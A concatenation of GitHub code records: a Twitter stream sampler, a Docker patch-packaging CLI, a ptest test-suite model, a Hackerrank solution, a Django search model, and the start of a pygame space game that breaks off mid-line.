Exception(\"Cannot get stream (HTTP {}): {}\".format(response.status_code, response.text))\n \n for response_line in response.iter_lines():\n if response_line:\n json_response = json.loads(response_line)\n self.save_tweet(tweet=json_response)\n \n if tweet_num % 100 == 0:\n print(\"tweets : %s\" %(str(tweet_num)))\n tweet_num += 1\n except KeyboardInterrupt:\n print(\"Cntrl+C pressed, Stopping Stream ............\")\n print(\"Flushing and Closing Files ..........\")\n self.tweets_fp.flush()\n self.tweets_fp.close()\n \n def save_tweet(self,tweet):\n \"\"\"\n \"\"\"\n self.tweets_fp.write(json.dumps(tweet,ensure_ascii=False,sort_keys=False)+\"\\n\")\n \n def stream(self):\n \"\"\"\n \"\"\"\n self.results_init()\n self.get_stream(stream_url=self.stream_url)\n\n\nif __name__ == '__main__':\n \n twitter_streamer = TwitterRandomSampleStream(stream_url=create_url(),\n save_path=\"random_tweets.txt\")\n\n twitter_streamer.stream()\n ","repo_name":"karthikshivaram24/Twitter-News-Engagement-Data-Collection","sub_path":"src/seedusers/twitter_random_stream_sampler.py","file_name":"twitter_random_stream_sampler.py","file_ext":"py","file_size_in_byte":2461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39889080460","text":"# -*- coding: utf-8 -*-\n\nimport logging\nimport os\nimport shutil\nimport sys\nimport tarfile\nimport time\nfrom pathlib import Path\nfrom pprint import pprint\n\nimport click\nimport gitdb\nimport sh\nfrom git import Repo\nfrom prompt_toolkit import prompt\nfrom prompt_toolkit.completion import WordCompleter\n\nGLOBAL_DIFF_FILES = []\nDEFAULT_CODE_PATH = os.path.abspath(os.path.dirname(__file__))\nKEYWORDS_DICT = {'code_path': None, 'config_name': None, 'code_branch': None,\n 'start_commit': None, 'end_commit': None, 'images_name': None}\n\n\nlogger = logging.getLogger('docker_patch')\nhandler = logging.StreamHandler()\nformatter = logging.Formatter('[%(name)s|%(levelname)-7s]: %(message)s')\nhandler.setFormatter(formatter)\nlogger.addHandler(handler)\nlogger.setLevel(logging.DEBUG)\n\n\nclass BaseClass:\n \"\"\"定义基础基类\"\"\"\n\n def __init__(self, code_path, code_branch, start_commit, end_commit, images_name):\n self.code_path = code_path\n self.code_branch = code_branch\n self.start_commit = start_commit\n self.end_commit = end_commit\n self.images_name = images_name\n self.repo = Repo(self.code_path)\n\n\nclass Check(BaseClass):\n \"\"\"参数环境状态检查\"\"\"\n\n def __init__(self, code_path, code_branch, start_commit, end_commit, images_name):\n super().__init__(code_path, code_branch, start_commit, end_commit, images_name)\n\n def _is_root(self):\n \"\"\"检查当前用户是否为root用户\"\"\"\n if os.geteuid() != 0:\n logger.error(f'Please use root to execute the script.')\n sys.exit(1)\n\n def _is_tool(self, commands):\n \"\"\"检查必须命令是否存在\"\"\"\n from shutil import which\n for command in commands:\n if which(command) is None:\n logger.error(f'The `{command}` not found, please install.')\n sys.exit(1)\n else:\n logger.info(f'The `{command}` command is ready install.')\n\n def _is_git_repo(self):\n \"\"\"检查该路径是否是一个Git仓库\"\"\"\n git_repo = os.path.join(self.code_path, '.git')\n if not os.path.isdir(git_repo):\n logger.error(f'The {git_repo} is not a git repo.')\n sys.exit(1)\n else:\n logger.info(f'The `{git_repo}` is a git repo.')\n\n def _repo_is_dirty(self):\n \"\"\"检查仓库是否存在未提交文件\"\"\"\n if len(self.repo.untracked_files) != 0:\n logger.error(\n f'The repo is dirty about {self.repo.untracked_files}.')\n sys.exit(1)\n elif self.repo.is_dirty():\n logger.error(\n f'The repo has some file not push to remote repo.')\n sys.exit(1)\n else:\n logger.info(f'The `{self.repo.git_dir}` is a clean git repo.')\n\n def _commit_is_right(self):\n \"\"\"检查分支和对应commit是否存在\"\"\"\n branchs = []\n [branchs.append(str(self.repo.refs[num])) for num in range(len(self.repo.refs))]\n try:\n if self.code_branch in branchs:\n if self.repo.commit(self.start_commit) and self.repo.commit(self.end_commit):\n logger.info(f\"The `{self.code_branch}` is exist in the git repo.\")\n logger.info(f\"The `{self.start_commit}` and `{self.end_commit}` is exist git.\")\n else:\n logger.error(f\"The `{self.code_branch}` is not found in the git repo.\")\n sys.exit(1)\n except gitdb.exc.BadName:\n logger.error(\n f\"The `{self.start_commit}` or `{self.end_commit}` is not found in the git repo.\")\n sys.exit(1)\n\n def _image_is_right(self):\n \"\"\"检查镜像是否可以拉取到\"\"\"\n try:\n logger.warning(f\"The `{self.images_name}` image is ready to download...\")\n sh.docker('pull', self.images_name)\n logger.info(f\"The `{self.images_name}` image is exist in docker repo.\")\n except sh.ErrorReturnCode_1:\n logger.error(f\"The `{self.images_name}` image is not found in docker repo.\")\n sys.exit(1)\n\n def run(self):\n \"\"\"执行check内容\"\"\"\n try:\n self._is_root()\n self._is_tool(['git', 'docker'])\n self._is_git_repo()\n self._repo_is_dirty()\n self._commit_is_right()\n self._image_is_right()\n print()\n except SystemExit:\n click.echo(click.style('[E_INFOS] === 打包需谨慎 使得万年船 ===', fg='red'))\n sys.exit(1)\n\n\nclass Diff(BaseClass):\n \"\"\"获取分支commit差异文件列表\"\"\"\n\n def __init__(self, code_path, code_branch, start_commit, end_commit, images_name):\n super().__init__(code_path, code_branch, start_commit, end_commit, images_name)\n\n def _diff_file(self):\n \"\"\"获取差异文件列表\"\"\"\n new_branch = self.repo.create_head(self.code_branch)\n if self.repo.active_branch != new_branch:\n new_branch.checkout()\n logger.warning(f\"The `{self.repo.active_branch}` doesn't match `{self.code_branch}`.\")\n logger.warning(f\"Then auto change to `{self.code_branch}` branch.\")\n git = self.repo.git\n try:\n diff_files = git.diff('--name-only', self.start_commit, self.end_commit).split()\n GLOBAL_DIFF_FILES.append(diff_files)\n logger.info(f'List diff files:')\n pprint(diff_files, indent=4)\n except git.exc.GitCommandError:\n logger.error(f\"The diff command execution failed.\")\n sys.exit(2)\n\n def run(self):\n \"\"\"执行diff内容\"\"\"\n try:\n self._diff_file()\n print()\n except SystemExit:\n click.echo(click.style('[E_INFOS] === 打包需谨慎 使得万年船 ===', fg='red'))\n sys.exit(2)\n\n\nclass PATCH(BaseClass):\n \"\"\"启动Docker获取编译后的SO文件\"\"\"\n\n def __init__(self, code_path, config_name, code_branch, start_commit, end_commit, images_name):\n super().__init__(code_path, code_branch, start_commit, end_commit, images_name)\n self.config_name = config_name\n\n def _check_is_file(self, path):\n if Path(path).is_file():\n return True\n else:\n return False\n\n def _check_is_dir(self, path):\n if Path(path).is_dir():\n return True\n else:\n return False\n\n def _check_file_endswith(self, source_file_basename):\n for suffix in ['.js', '.css', '.html', '.png', '.svg', '.zip']:\n if source_file_basename.endswith(suffix):\n return True\n else:\n return False\n\n def _copy_file(self):\n \"\"\"复制文件并打包\n 特殊转换: yml -> ctc | py -> so/pyc\n \"\"\"\n archive_dir = os.path.join(DEFAULT_CODE_PATH, 'dist')\n images_info = sh.docker(\"inspect\", \"--format\", \"'{{.GraphDriver.Data.UpperDir}}'\", self.images_name)\n working_dir = sh.docker(\"inspect\", \"--format\", \"'{{.ContainerConfig.WorkingDir}}'\", self.images_name)\n if images_info.exit_code == 0 and working_dir.exit_code == 0:\n images_path = images_info.stdout.decode('utf-8').strip().strip(\"'\")\n working_path = working_dir.stdout.decode('utf-8').strip().strip(\"'\")\n copy_file_path = ''.join([images_path, working_path])\n if not self._check_is_dir(archive_dir):\n os.makedirs(archive_dir)\n else:\n shutil.rmtree(archive_dir)\n\n diff_files = GLOBAL_DIFF_FILES.pop()\n for _file in diff_files:\n time.sleep(0.5)\n source_file_path = os.path.join(copy_file_path, _file)\n source_file_dirname = os.path.dirname(source_file_path)\n source_file_basename = os.path.basename(source_file_path)\n target_file_path = os.path.join(archive_dir, _file)\n target_file_dirname = os.path.dirname(target_file_path)\n target_file_basename = os.path.basename(target_file_path)\n\n # 特殊转换文件\n if source_file_basename.endswith('.py'):\n source_file_is_so = source_file_path.replace('.py', '.so')\n source_file_is_pyc = source_file_path.replace('.py', '.pyc')\n if self._check_is_file(source_file_is_so):\n if not self._check_is_dir(target_file_dirname):\n os.makedirs(target_file_dirname)\n logger.info(f\"To {source_file_basename} file to {target_file_dirname} ...\")\n shutil.copy2(source_file_is_so, target_file_dirname)\n elif self._check_is_file(source_file_is_pyc):\n if not self._check_is_dir(target_file_dirname):\n os.makedirs(target_file_dirname)\n logger.info(f\"To {source_file_basename} file to {target_file_dirname} ...\")\n shutil.copy2(source_file_is_pyc, target_file_dirname)\n else:\n logger.info(f\"The file <{source_file_basename}> is not in image, pass ...\")\n elif source_file_basename.endswith('.yml'):\n source_file_is_yml = source_file_path.replace('.yml', '.ctc')\n if self._check_is_file(source_file_is_yml):\n if not self._check_is_dir(target_file_dirname):\n os.makedirs(target_file_dirname)\n logger.info(f\"To {source_file_basename} file to {target_file_dirname} ...\")\n shutil.copy2(source_file_is_yml, target_file_dirname)\n else:\n logger.info(f\"The file <{source_file_basename}> is not in image, pass ...\")\n\n # 普通类型文件\n elif self._check_file_endswith(source_file_basename):\n if self._check_is_file(source_file_path):\n if not self._check_is_dir(target_file_dirname):\n os.makedirs(target_file_dirname)\n logger.info(f\"To {source_file_basename} file to {target_file_dirname} ...\")\n shutil.copy2(source_file_path, target_file_dirname)\n else:\n logger.info(f\"The file <{source_file_basename}> is not in image, pass ...\")\n\n # 忽略其余文件\n else:\n if self._check_is_file(source_file_path):\n if not self._check_is_dir(target_file_dirname):\n os.makedirs(target_file_dirname)\n logger.info(f\"To {source_file_basename} file to {target_file_dirname} ...\")\n shutil.copy2(source_file_path, target_file_dirname)\n else:\n logger.info(f\"The file <{source_file_basename}> is not in image, pass ...\")\n else:\n logger.error(f\"The `{images_info}` or `{working_dir}` is not found.\")\n sys.exit(3)\n\n def _get_tar_packages(self):\n click.echo(click.style('>>> To being generated tar ...', fg='green'))\n archive_dir = os.path.join(DEFAULT_CODE_PATH, 'dist')\n version_number = self.images_name.split(':')[2]\n archive_name = '_'.join(['patch', self.config_name, version_number]) + \".tar.gz\"\n if self._check_is_dir(archive_dir):\n with tarfile.open(archive_name, 'w:gz') as tar_packages:\n tar_packages.add(archive_dir, arcname='.')\n logger.info(f'List tar package file:')\n pprint(tar_packages.getnames(), indent=4)\n logger.info(f\"The `{archive_name}` tar package has been generated successfully.\")\n\n def run(self):\n \"\"\"执行copy内容\"\"\"\n try:\n self._copy_file()\n print()\n self._get_tar_packages()\n except SystemExit:\n click.echo(click.style('[E_INFOS] === 打包需谨慎 使得万年船 ===', fg='red'))\n sys.exit(3)\n\n\n@click.command()\n@click.argument('code_path')\n@click.argument('config_name')\n@click.argument('code_branch')\n@click.argument('start_commit')\n@click.argument('end_commit')\n@click.argument('images_name')\ndef tools(code_path, config_name, code_branch, start_commit, end_commit, images_name):\n \"\"\"A rapidly iterating Docker deployment applet\"\"\"\n # 健康检查\n click.echo(click.style('>>> Start check info ...', fg='green'))\n check = Check(code_path, code_branch, start_commit, end_commit, images_name)\n check.run()\n # 差异文件\n click.echo(click.style('>>> Get between the commits diff file ...', fg='green'))\n diff = Diff(code_path, code_branch, start_commit, end_commit, images_name)\n diff.run()\n # 打补丁包\n click.echo(click.style('>>> Get docker images fix packs ...', fg='green'))\n patch = PATCH(code_path, config_name, code_branch, start_commit, end_commit, images_name)\n patch.run()\n\n\ndef main():\n len_args = len(sys.argv)\n if len_args > 1:\n user_input_list = []\n try:\n for user_input in sys.argv[1:]:\n user_input_value = user_input.split('=')[1]\n user_input_list.append(user_input_value)\n logger.info(f'All the required parameters have been entered.\\n')\n tools(user_input_list)\n except Exception:\n logger.warning(f'The {user_input} not in support args, please input again.')\n sys.exit(0)\n\n tools_keywords = list(KEYWORDS_DICT.keys())\n while True:\n try:\n user_input = prompt('TOOLS> ', completer=WordCompleter(tools_keywords))\n user_input_key = user_input.split('=')[0]\n user_input_value = user_input.split('=')[1]\n tmp_dict = {user_input_key: user_input_value}\n if user_input_key in tools_keywords:\n KEYWORDS_DICT.update(tmp_dict)\n tools_keywords.remove(user_input_key)\n if len(tools_keywords) == 0:\n click.echo(click.style('\\n>>> Input keywords show ...', fg='green'))\n pprint(KEYWORDS_DICT, indent=4)\n if click.confirm('Do you want to continue?'):\n logger.info(f'All the required parameters have been entered.\\n')\n tools(KEYWORDS_DICT.values())\n break\n else:\n break\n else:\n logger.warning(f'The {user_input_key} not in support args, please input again.')\n except Exception:\n logger.warning(f'There is something wrong with your output, please enter again.')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"EscapeLife/awesome-builder","sub_path":"scripts/docker_patch/docker_patch.py","file_name":"docker_patch.py","file_ext":"py","file_size_in_byte":14829,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"52"} +{"seq_id":"32298035141","text":"import types\nfrom functools import cmp_to_key\n\nfrom .enumeration import PDecoratorType, TestFixtureStatus, TestClassRunMode, TestCaseStatus\n\nSECOND_MICROSECOND_CONVERSION_FACTOR = 1000000.0\n\n\nclass StatusCount:\n def __init__(self):\n self.total = 0\n self.not_run = 0\n self.running = 0\n self.passed = 0\n self.failed = 0\n self.skipped = 0\n\n\nclass TestContainer:\n def __init__(self):\n self.start_time = None\n self.end_time = None\n self.test_cases = []\n\n @property\n def elapsed_time(self) -> float:\n time_delta = self.end_time - self.start_time\n return time_delta.seconds + time_delta.microseconds / SECOND_MICROSECOND_CONVERSION_FACTOR\n\n @property\n def status_count(self) -> StatusCount:\n count = StatusCount()\n for test_case in self.test_cases:\n count.total += 1\n if test_case.status == TestCaseStatus.NOT_RUN:\n count.not_run += 1\n elif test_case.status == TestCaseStatus.RUNNING:\n count.running += 1\n elif test_case.status == TestCaseStatus.PASSED:\n count.passed += 1\n elif test_case.status == TestCaseStatus.FAILED:\n count.failed += 1\n elif test_case.status == TestCaseStatus.SKIPPED:\n count.skipped += 1\n return count\n\n @property\n def pass_rate(self) -> float:\n status_count = self.status_count\n return float(status_count.passed) * 100 / status_count.total\n\n\nclass TestSuite(TestContainer):\n def __init__(self, name):\n TestContainer.__init__(self)\n self.test_classes = []\n self.test_class_run_groups = []\n self.name = name\n self.full_name = name\n self.before_suite = BeforeSuite(self, None)\n self.after_suite = AfterSuite(self, None)\n\n def init(self):\n self.init_test_fixtures()\n self.init_test_class_run_groups()\n self.sort_test_class_run_groups()\n\n def init_test_fixtures(self):\n # reflect the before suite and after suite\n for test_class in self.test_classes:\n test_class_ref = test_class.test_class_ref.__class__()\n for element in dir(test_class_ref):\n attr = getattr(test_class_ref, element)\n if hasattr(attr, \"__enabled__\") and attr.__enabled__ \\\n and hasattr(attr, \"__pd_type__\"):\n if attr.__pd_type__ == PDecoratorType.BeforeSuite:\n self.before_suite = BeforeSuite(self, attr)\n elif attr.__pd_type__ == PDecoratorType.AfterSuite:\n self.after_suite = AfterSuite(self, attr)\n\n def init_test_class_run_groups(self):\n run_groups = {}\n run_group_index = 0\n for test_class in self.test_classes:\n if test_class.run_group is None:\n run_groups[run_group_index] = [test_class]\n run_group_index += 1\n elif test_class.run_group in run_groups:\n run_groups[test_class.run_group].append(test_class)\n else:\n run_groups[test_class.run_group] = [test_class]\n self.test_class_run_groups = run_groups.values()\n\n def sort_test_class_run_groups(self):\n run_groups = []\n # sort the test classes in run group by its run mode\n for run_group in self.test_class_run_groups:\n run_groups.append(sorted(run_group, key=lambda test_class: test_class.run_mode.value, reverse=True))\n\n # sort the test class run groups by its number of singleline test cases\n def cmp_run_group(run_group_a, run_group_b):\n single_line_count_a = single_line_count_b = parallel_count_a = parallel_count_b = 0\n for test_class in run_group_a:\n if test_class.run_mode == TestClassRunMode.SingleLine:\n single_line_count_a += len(test_class.test_cases)\n else:\n parallel_count_a += len(test_class.test_cases)\n\n for test_class in run_group_b:\n if test_class.run_mode == TestClassRunMode.SingleLine:\n single_line_count_b += len(test_class.test_cases)\n else:\n parallel_count_b += len(test_class.test_cases)\n\n if single_line_count_a == single_line_count_b:\n return parallel_count_a - parallel_count_b\n else:\n return single_line_count_a - single_line_count_b\n\n self.test_class_run_groups = sorted(run_groups, key=cmp_to_key(cmp_run_group), reverse=True)\n\n def get_failed_setup_fixture(self):\n if self.before_suite.status == TestFixtureStatus.FAILED:\n return self.before_suite\n return None\n\n def get_test_class(self, full_name: str):\n for test_class in self.test_classes:\n if test_class.full_name == full_name:\n return test_class\n return None\n\n def add_test_case(self, test_class_cls, test_case_func):\n # for the @TestClass can be inherited, so set full name here\n test_class_cls.__full_name__ = \"%s.%s\" % (test_class_cls.__module__, test_class_cls.__name__)\n test_class = self.get_test_class(test_class_cls.__full_name__)\n if test_class is None:\n test_class = TestClass(self, test_class_cls())\n self.test_classes.append(test_class)\n\n test_group = test_class.get_test_group(test_case_func.__group__)\n if test_group is None:\n test_group = TestGroup(test_class, test_case_func.__group__, test_class_cls())\n test_class.test_groups.append(test_group)\n\n test_case = test_group.get_test_case(test_case_func.__name__)\n if test_case is None:\n if hasattr(test_class_cls, test_case_func.__name__): # normal\n test_case = TestCase(test_group, getattr(test_class_cls(), test_case_func.__name__))\n else: # mocked\n test_class_ref = test_class_cls()\n mock_method = types.MethodType(test_case_func, test_class_ref)\n setattr(test_class_ref, test_case_func.__name__, mock_method)\n test_case = TestCase(test_group, mock_method)\n test_group.test_cases.append(test_case)\n test_class.test_cases.append(test_case)\n self.test_cases.append(test_case)\n return True\n return False\n\n\nclass TestClass(TestContainer):\n def __init__(self, test_suite: TestSuite, test_class_ref):\n TestContainer.__init__(self)\n self.test_suite = test_suite\n self.test_class_ref = test_class_ref\n self.test_groups = []\n self.name = test_class_ref.__class__.__name__\n self.full_name = test_class_ref.__full_name__\n self.run_mode = test_class_ref.__run_mode__\n self.run_group = test_class_ref.__run_group__\n self.description = test_class_ref.__description__\n self.custom_args = test_class_ref.__custom_args__\n\n self.before_class = BeforeClass(self, None)\n self.after_class = AfterClass(self, None)\n # reflect the before class and after class\n for element in dir(test_class_ref):\n attr = getattr(test_class_ref, element)\n if hasattr(attr, \"__enabled__\") and attr.__enabled__ \\\n and hasattr(attr, \"__pd_type__\"):\n if attr.__pd_type__ == PDecoratorType.BeforeClass:\n self.before_class = BeforeClass(self, attr)\n elif attr.__pd_type__ == PDecoratorType.AfterClass:\n self.after_class = AfterClass(self, attr)\n\n def get_failed_setup_fixture(self) -> \"TestFixture\":\n setup_fixture = self.test_suite.get_failed_setup_fixture()\n if setup_fixture:\n return setup_fixture\n if self.before_class.status == TestFixtureStatus.FAILED:\n return self.before_class\n return None\n\n def get_test_group(self, name: str) -> \"TestGroup\":\n for test_group in self.test_groups:\n if test_group.name == name:\n return test_group\n return None\n\n @property\n def is_group_feature_used(self) -> bool:\n return not (len(self.test_groups) == 1 and self.test_groups[0].name == \"DEFAULT\" and self.test_groups[\n 0].before_group.is_empty and self.test_groups[0].after_group.is_empty)\n\n\nclass TestGroup(TestContainer):\n def __init__(self, test_class: TestClass, name: str, test_class_ref):\n TestContainer.__init__(self)\n self.test_class = test_class\n self.test_suite = self.test_class.test_suite\n self.test_class_ref = test_class_ref\n self.test_cases = []\n self.name = name\n self.full_name = \"%s<%s>\" % (test_class.full_name, name)\n\n self.before_group = BeforeGroup(self, None)\n self.after_group = AfterGroup(self, None)\n # reflect the before group and after group\n for element in dir(test_class_ref):\n attr = getattr(test_class_ref, element)\n if hasattr(attr, \"__enabled__\") and attr.__enabled__ \\\n and hasattr(attr, \"__group__\") and attr.__group__ == self.name \\\n and hasattr(attr, \"__pd_type__\"):\n if attr.__pd_type__ == PDecoratorType.BeforeGroup:\n self.before_group = BeforeGroup(self, attr)\n elif attr.__pd_type__ == PDecoratorType.AfterGroup:\n self.after_group = AfterGroup(self, attr)\n\n def get_failed_setup_fixture(self) -> \"TestFixture\":\n setup_fixture = self.test_class.get_failed_setup_fixture()\n if setup_fixture:\n return setup_fixture\n if self.before_group.status == TestFixtureStatus.FAILED:\n return self.before_group\n return None\n\n def get_test_case(self, name: str) -> \"TestCase\":\n for test_case in self.test_cases:\n if test_case.name == name:\n return test_case\n return None\n\n\nclass TestCase:\n def __init__(self, test_group: TestGroup, test_case_ref):\n self.test_group = test_group\n self.test_class = self.test_group.test_class\n self.test_suite = self.test_class.test_suite\n self.test_case_ref = test_case_ref\n self.name = test_case_ref.__name__\n self.full_name = \"%s.%s\" % (self.test_class.full_name, self.name)\n self.start_time = None\n self.end_time = None\n\n self.test = Test(self, test_case_ref)\n\n self.tags = self.test.tags\n self.expected_exceptions = self.test.expected_exceptions\n self.parameters = self.test.parameters\n self.data_index = self.test.data_index\n self.group = self.test.group\n self.description = self.test.description\n self.custom_args = self.test.custom_args\n self.location = self.test.location\n\n self.before_method = BeforeMethod(self, None)\n self.after_method = AfterMethod(self, None)\n # reflect the before method and after method\n for element in dir(test_case_ref.__self__):\n attr = getattr(test_case_ref.__self__, element)\n if hasattr(attr, \"__enabled__\") and attr.__enabled__ \\\n and hasattr(attr, \"__group__\") and attr.__group__ == self.group \\\n and hasattr(attr, \"__pd_type__\"):\n if attr.__pd_type__ == PDecoratorType.BeforeMethod:\n self.before_method = BeforeMethod(self, attr)\n elif attr.__pd_type__ == PDecoratorType.AfterMethod:\n self.after_method = AfterMethod(self, attr)\n\n def get_failed_setup_fixture(self) -> \"TestFixture\":\n setup_fixture = self.test_group.get_failed_setup_fixture()\n if setup_fixture:\n return setup_fixture\n if self.before_method.status == TestFixtureStatus.FAILED:\n return self.before_method\n return None\n\n @property\n def failure_message(self) -> str:\n return self.test.failure_message\n\n @property\n def failure_type(self) -> str:\n return self.test.failure_type\n\n @property\n def stack_trace(self) -> str:\n return self.test.stack_trace\n\n @property\n def skip_message(self) -> str:\n return self.test.skip_message\n\n @property\n def status(self) -> TestCaseStatus:\n status_map = {\n TestFixtureStatus.NOT_RUN: TestCaseStatus.NOT_RUN,\n TestFixtureStatus.RUNNING: TestCaseStatus.RUNNING,\n TestFixtureStatus.PASSED: TestCaseStatus.PASSED,\n TestFixtureStatus.SKIPPED: TestCaseStatus.SKIPPED,\n TestFixtureStatus.FAILED: TestCaseStatus.FAILED,\n }\n return status_map[self.test.status]\n\n @property\n def elapsed_time(self) -> float:\n time_delta = self.end_time - self.start_time\n return time_delta.seconds + time_delta.microseconds / SECOND_MICROSECOND_CONVERSION_FACTOR\n\n\nclass TestFixture:\n def __init__(self, context, test_fixture_ref, fixture_type: PDecoratorType):\n self.context = context\n self.fixture_type = fixture_type\n self.is_empty = False\n self.status = TestFixtureStatus.NOT_RUN\n if test_fixture_ref is None:\n self.is_empty = True\n return\n self.test_fixture_ref = test_fixture_ref\n self.name = test_fixture_ref.__name__\n self.full_name = \"\"\n self.failure_message = \"\"\n self.failure_type = \"\"\n self.stack_trace = \"\"\n self.skip_message = \"\"\n self.start_time = None\n self.end_time = None\n self.logs = []\n self.description = test_fixture_ref.__description__\n self.timeout = test_fixture_ref.__timeout__\n self.custom_args = test_fixture_ref.__custom_args__\n self.location = test_fixture_ref.__location__\n self.parameters_count = test_fixture_ref.__parameters_count__\n\n @property\n def elapsed_time(self) -> float:\n time_delta = self.end_time - self.start_time\n return time_delta.seconds + time_delta.microseconds / SECOND_MICROSECOND_CONVERSION_FACTOR\n\n\nclass BeforeSuite(TestFixture):\n def __init__(self, test_suite: TestSuite, test_fixture_ref):\n TestFixture.__init__(self, test_suite, test_fixture_ref, PDecoratorType.BeforeSuite)\n self.test_suite = self.context\n if not self.is_empty:\n self.full_name = \"%s@%s\" % (test_suite.name, self.fixture_type.value)\n\n\nclass BeforeClass(TestFixture):\n def __init__(self, test_class: TestClass, test_fixture_ref):\n TestFixture.__init__(self, test_class, test_fixture_ref, PDecoratorType.BeforeClass)\n self.test_class = self.context\n self.test_suite = self.test_class.test_suite\n if not self.is_empty:\n self.full_name = \"%s@%s\" % (test_class.full_name, self.fixture_type.value)\n\n\nclass BeforeGroup(TestFixture):\n def __init__(self, test_group: TestGroup, test_fixture_ref):\n TestFixture.__init__(self, test_group, test_fixture_ref, PDecoratorType.BeforeGroup)\n self.test_group = self.context\n self.test_class = self.test_group.test_class\n self.test_suite = self.test_group.test_suite\n if not self.is_empty:\n self.full_name = \"%s@%s\" % (test_group.full_name, self.fixture_type.value)\n self.group = test_fixture_ref.__group__\n\n\nclass BeforeMethod(TestFixture):\n def __init__(self, test_case: TestCase, test_fixture_ref):\n TestFixture.__init__(self, test_case, test_fixture_ref, PDecoratorType.BeforeMethod)\n self.test_case = self.context\n self.test_group = self.test_case.test_group\n self.test_class = self.test_case.test_class\n self.test_suite = self.test_case.test_suite\n if not self.is_empty:\n self.full_name = \"%s@%s\" % (test_case.full_name, self.fixture_type.value)\n self.group = test_fixture_ref.__group__\n\n\nclass Test(TestFixture):\n def __init__(self, test_case: TestCase, test_fixture_ref):\n TestFixture.__init__(self, test_case, test_fixture_ref, PDecoratorType.Test)\n self.full_name = \"%s@%s\" % (test_case.full_name, self.fixture_type.value)\n self.test_case = self.context\n self.test_group = self.test_case.test_group\n self.test_class = self.test_case.test_class\n self.test_suite = self.test_case.test_suite\n self.tags = test_fixture_ref.__tags__\n self.expected_exceptions = test_fixture_ref.__expected_exceptions__\n self.parameters = test_fixture_ref.__parameters__\n self.data_index = test_fixture_ref.__data_index__\n self.group = test_fixture_ref.__group__\n\n\nclass AfterMethod(TestFixture):\n def __init__(self, test_case: TestCase, test_fixture_ref):\n TestFixture.__init__(self, test_case, test_fixture_ref, PDecoratorType.AfterMethod)\n self.test_case = self.context\n self.test_group = self.test_case.test_group\n self.test_class = self.test_case.test_class\n self.test_suite = self.test_case.test_suite\n if not self.is_empty:\n self.full_name = \"%s@%s\" % (test_case.full_name, self.fixture_type.value)\n self.always_run = test_fixture_ref.__always_run__\n self.group = test_fixture_ref.__group__\n\n\nclass AfterGroup(TestFixture):\n def __init__(self, test_group: TestGroup, test_fixture_ref):\n TestFixture.__init__(self, test_group, test_fixture_ref, PDecoratorType.AfterGroup)\n self.test_group = self.context\n self.test_class = self.test_group.test_class\n self.test_suite = self.test_group.test_suite\n if not self.is_empty:\n self.full_name = \"%s@%s\" % (test_group.full_name, self.fixture_type.value)\n self.always_run = test_fixture_ref.__always_run__\n self.group = test_fixture_ref.__group__\n\n\nclass AfterClass(TestFixture):\n def __init__(self, test_class: TestClass, test_fixture_ref):\n TestFixture.__init__(self, test_class, test_fixture_ref, PDecoratorType.AfterClass)\n self.test_class = self.context\n self.test_suite = self.test_class.test_suite\n if not self.is_empty:\n self.full_name = \"%s@%s\" % (test_class.full_name, self.fixture_type.value)\n self.always_run = test_fixture_ref.__always_run__\n\n\nclass AfterSuite(TestFixture):\n def __init__(self, test_suite: TestSuite, test_fixture_ref):\n TestFixture.__init__(self, test_suite, test_fixture_ref, PDecoratorType.AfterSuite)\n self.test_suite = self.context\n if not self.is_empty:\n self.full_name = \"%s@%s\" % (test_suite.name, self.fixture_type.value)\n self.always_run = test_fixture_ref.__always_run__\n\n\ndefault_test_suite = TestSuite(\"DefaultSuite\")\n","repo_name":"KarlGong/ptest","sub_path":"ptest/test_suite.py","file_name":"test_suite.py","file_ext":"py","file_size_in_byte":18746,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"52"} +{"seq_id":"1034411285","text":"import sys\n\nn, k = map(int, sys.stdin.readline().split())\narr = list(map(int, sys.stdin.readline().split()))\n\nresult = 0\npage = 1\nstorage = []\n\nfor i in arr:\n for j in range(1,i+1):\n if len(storage) == k:\n storage = []\n page = page + 1\n storage.append(j)\n if j == page:\n result = result + 1\n page = page + 1\n storage = []\n\nprint(result)","repo_name":"JeongHooon-Lee/Hackerrank_Python","sub_path":"Easy/After 157/182.Lisas Workbook.py","file_name":"182.Lisas Workbook.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27437691849","text":"from django.contrib.postgres.indexes import GinIndex\nfrom django.contrib.postgres.search import SearchVectorField\nfrom django.db import models\nfrom django.urls import reverse\n\n\nclass FTSReview(models.Model):\n productId = models.CharField(max_length=200, db_index=True)\n userId = models.CharField(max_length=200, db_index=True)\n name = models.CharField(max_length=200)\n review_help_total = models.PositiveIntegerField()\n review_help_help = models.PositiveIntegerField()\n review_score = models.FloatField()\n review_time = models.DateTimeField()\n review_summary = models.TextField()\n review_text = models.TextField()\n\n review_index = SearchVectorField(null=True)\n class Meta:\n indexes = [GinIndex(fields=[\"review_index\"])]\n\n def get_absolute_url(self):\n return reverse('search:review_detail', args=[self.productId, self.userId])\n\n\n","repo_name":"stbaercom/djangocon_eu_2020_searchoptions","sub_path":"django_search_talk/django_search_app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29492948782","text":"import sys, pygame\nfrom levels.redspace import RedSpace\nfrom levels.bluespace import BlueSpace\nfrom levels.worldnames import WorldNames\n\nfrom ship import Ship\n\nscreen = None\ngame_assets = []\nGAME = None\n\ngame_worlds = []\n\n# Global Constants\nw = 600\nh = 600\n\nclass Game(object):\n def __init__(self):\n self.width = 2000\n self.height = 2000\n self.screen_width = w\n self.screen_height = h\n self.offset = {'x': 0, 'y': 0}\n self.safe_zone = [{'x': 0, 'y': 0}, {'x': 400, 'y': 400}]\n self.player = Ship(self)\n\n game_worlds.append(RedSpace(self, {'x': self.width, 'y': self.height}))\n game_worlds.append(BlueSpace(self, {'x': self.width, 'y': self.height}))\n\n self.current_level = game_worlds[0]\n\n def draw_assets(self):\n if screen is None:\n return\n\n self.current_level.draw(screen)\n self.player.draw(screen)\n\n def set_offset(self, x, y):\n self.offset = {'x': x, 'y': y}\n\n def update_assets(self):\n self.player.update()\n self.current_level.update()\n\n def change_level(self, level, player_loc=None):\n self.current_level = self.get_worlds_list()[level]\n if player_loc is 